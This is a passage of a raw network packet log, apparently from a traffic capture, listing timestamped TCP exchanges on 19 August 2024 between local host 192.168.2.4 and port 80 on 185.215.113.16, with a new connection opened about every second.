Aug 19, 2024 06:04:04.575293064 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575309992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575321913 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.575334072 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575347900 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575361013 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.575361967 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575376987 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575383902 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.575395107 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.575398922 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.575427055 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.575440884 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.576184034 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576208115 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576225042 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576236010 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.576240063 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576255083 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576256990 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.576271057 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576277018 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.576287985 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.576302052 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.576334000 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.630367994 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630392075 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630409956 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630424976 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630441904 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630458117 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630475044 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630491972 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.630650043 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.660517931 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.660552025 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.660567045 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.660593033 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.660609961 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.660624981 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.660785913 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:05.391501904 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:05.396656990 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:05.396718025 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:05.417654037 CEST	49738	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:05.422449112 CEST	80	49738	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:05.422528028 CEST	49738	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:05.578625917 CEST	49738	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:05.585414886 CEST	80	49738	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:06.173964977 CEST	80	49738	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:06.174069881 CEST	49738	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:06.289464951 CEST	49738	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:06.289726019 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:06.294434071 CEST	80	49738	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:06.294504881 CEST	49738	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:06.294553041 CEST	80	49739	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:06.294627905 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:06.294747114 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:06.301243067 CEST	80	49739	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:07.043138981 CEST	80	49739	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:07.043220997 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.046747923 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.053306103 CEST	80	49739	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:07.295567989 CEST	80	49739	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:07.295620918 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.398622036 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.398910999 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.403750896 CEST	80	49739	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:07.403907061 CEST	49739	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.404170990 CEST	80	49740	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:07.404256105 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.404413939 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:07.409368038 CEST	80	49740	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:08.199399948 CEST	80	49740	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:08.200393915 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.372549057 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.377624035 CEST	80	49740	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:08.623753071 CEST	80	49740	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:08.623831987 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.726808071 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.727171898 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.732033014 CEST	80	49740	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:08.732045889 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:08.732170105 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.732207060 CEST	49740	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.732296944 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:08.737004042 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:09.515661955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:09.515719891 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.516375065 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.521935940 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:09.767544031 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:09.767602921 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.882805109 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.883093119 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.887952089 CEST	80	49742	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:09.888134956 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.888324022 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.892374039 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:09.892586946 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:09.893538952 CEST	80	49742	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:10.643552065 CEST	80	49742	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:10.643944025 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:10.648334026 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:10.653218031 CEST	80	49742	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:10.928026915 CEST	80	49742	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:10.928129911 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.039175034 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.039788008 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.044343948 CEST	80	49742	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:11.044394016 CEST	49742	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.044990063 CEST	80	49743	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:11.045101881 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.045289040 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.051261902 CEST	80	49743	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:11.790396929 CEST	80	49743	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:11.790471077 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.791265965 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:11.796663046 CEST	80	49743	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:12.038708925 CEST	80	49743	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:12.038835049 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.148504972 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.148736000 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.154422045 CEST	80	49744	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:12.154944897 CEST	80	49743	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:12.154964924 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.155024052 CEST	49743	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.155153036 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.159862995 CEST	80	49744	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:12.911755085 CEST	80	49744	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:12.911840916 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.915214062 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:12.920332909 CEST	80	49744	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:13.165496111 CEST	80	49744	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:13.165575027 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:13.273531914 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:13.273942947 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:13.278976917 CEST	80	49745	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:13.279067039 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:13.279222965 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:13.283299923 CEST	80	49744	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:13.283365011 CEST	49744	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:13.284010887 CEST	80	49745	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:14.035438061 CEST	80	49745	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:14.035526037 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.036417961 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.041167021 CEST	80	49745	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:14.285152912 CEST	80	49745	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:14.285243988 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.402442932 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.402992010 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.407661915 CEST	80	49745	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:14.407721043 CEST	49745	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.407758951 CEST	80	49746	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:14.407828093 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.408303022 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:14.413845062 CEST	80	49746	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:15.193958044 CEST	80	49746	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:15.194062948 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.443603992 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.448569059 CEST	80	49746	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:15.695039034 CEST	80	49746	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:15.695146084 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.804728031 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.804934025 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.809890985 CEST	80	49747	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:15.809926033 CEST	80	49746	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:15.809968948 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.810003042 CEST	49746	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.810082912 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:15.814914942 CEST	80	49747	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:16.568376064 CEST	80	49747	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:16.568567038 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.581504107 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.586524963 CEST	80	49747	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:16.833468914 CEST	80	49747	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:16.833632946 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.945466042 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.945775986 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.950596094 CEST	80	49747	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:16.950691938 CEST	49747	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.950736046 CEST	80	49748	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:16.950814962 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.950937033 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:16.956774950 CEST	80	49748	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:17.706738949 CEST	80	49748	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:17.706857920 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:17.921116114 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:17.926012039 CEST	80	49748	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:18.169989109 CEST	80	49748	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:18.170090914 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:18.318172932 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:18.318509102 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:18.323292017 CEST	80	49748	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:18.323304892 CEST	80	49749	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:18.323354959 CEST	49748	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:18.323385954 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:18.323564053 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:18.328306913 CEST	80	49749	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:19.073502064 CEST	80	49749	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:19.073599100 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.074239969 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.079632998 CEST	80	49749	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:19.321466923 CEST	80	49749	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:19.321541071 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.447289944 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.447772026 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.452449083 CEST	80	49749	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:19.452522993 CEST	49749	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.452554941 CEST	80	49750	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:19.452620029 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.454060078 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:19.458854914 CEST	80	49750	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:20.222008944 CEST	80	49750	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:20.222168922 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.222733021 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.227565050 CEST	80	49750	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:20.475478888 CEST	80	49750	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:20.475562096 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.586585999 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.586901903 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.591789007 CEST	80	49750	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:20.591801882 CEST	80	49751	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:20.591835976 CEST	49750	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.591890097 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.592134953 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:20.596910954 CEST	80	49751	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:21.342112064 CEST	80	49751	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:21.342585087 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.343158960 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.347906113 CEST	80	49751	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:21.589850903 CEST	80	49751	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:21.589946985 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.697926998 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.698200941 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.703030109 CEST	80	49752	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:21.703207970 CEST	80	49751	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:21.703290939 CEST	49751	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.703291893 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.703495026 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:21.708314896 CEST	80	49752	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:22.465619087 CEST	80	49752	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:22.465708971 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:22.522083998 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:22.526987076 CEST	80	49752	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:22.770267010 CEST	80	49752	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:22.770395994 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.087074995 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.087403059 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.092283964 CEST	80	49753	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:23.092333078 CEST	80	49752	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:23.092375040 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.092405081 CEST	49752	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.092601061 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.097311020 CEST	80	49753	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:23.854127884 CEST	80	49753	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:23.854197979 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.854988098 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:23.860532045 CEST	80	49753	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:24.105228901 CEST	80	49753	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:24.105319023 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.211368084 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.211638927 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.216427088 CEST	80	49754	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:24.216530085 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.216645002 CEST	80	49753	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:24.216710091 CEST	49753	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.216782093 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.221559048 CEST	80	49754	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:24.985553026 CEST	80	49754	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:24.985644102 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.986649990 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:24.991566896 CEST	80	49754	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:25.240358114 CEST	80	49754	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:25.240437031 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:25.361376047 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:25.361728907 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:25.366735935 CEST	80	49755	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:25.366832018 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:25.366930008 CEST	80	49754	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:25.366980076 CEST	49754	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:25.460649967 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:25.465751886 CEST	80	49755	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:26.129812956 CEST	80	49755	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:26.129935026 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.130620003 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.136400938 CEST	80	49755	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:26.380980015 CEST	80	49755	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:26.381057978 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.492242098 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.492552042 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.497251987 CEST	80	49755	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:26.497319937 CEST	49755	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.497323990 CEST	80	49756	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:26.497392893 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.497684002 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:26.502465010 CEST	80	49756	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:27.295145035 CEST	80	49756	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:27.295253992 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.301378012 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.306133032 CEST	80	49756	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:27.556895018 CEST	80	49756	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:27.556948900 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.710562944 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.710915089 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.715673923 CEST	80	49756	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:27.715729952 CEST	49756	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.715753078 CEST	80	49757	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:27.715827942 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.716563940 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:27.721375942 CEST	80	49757	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:28.478374958 CEST	80	49757	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:28.478437901 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.479024887 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.484539986 CEST	80	49757	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:28.729768991 CEST	80	49757	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:28.729841948 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.836419106 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.836802959 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.841593981 CEST	80	49758	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:28.841660976 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.841768026 CEST	80	49757	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:28.841790915 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.841820955 CEST	49757	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:28.846560955 CEST	80	49758	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:29.613315105 CEST	80	49758	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:29.613377094 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:29.650537014 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:29.655414104 CEST	80	49758	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:29.910810947 CEST	80	49758	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:29.910986900 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:30.074202061 CEST	49758	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:30.079639912 CEST	80	49758	185.215.113.16	192.168.2.4
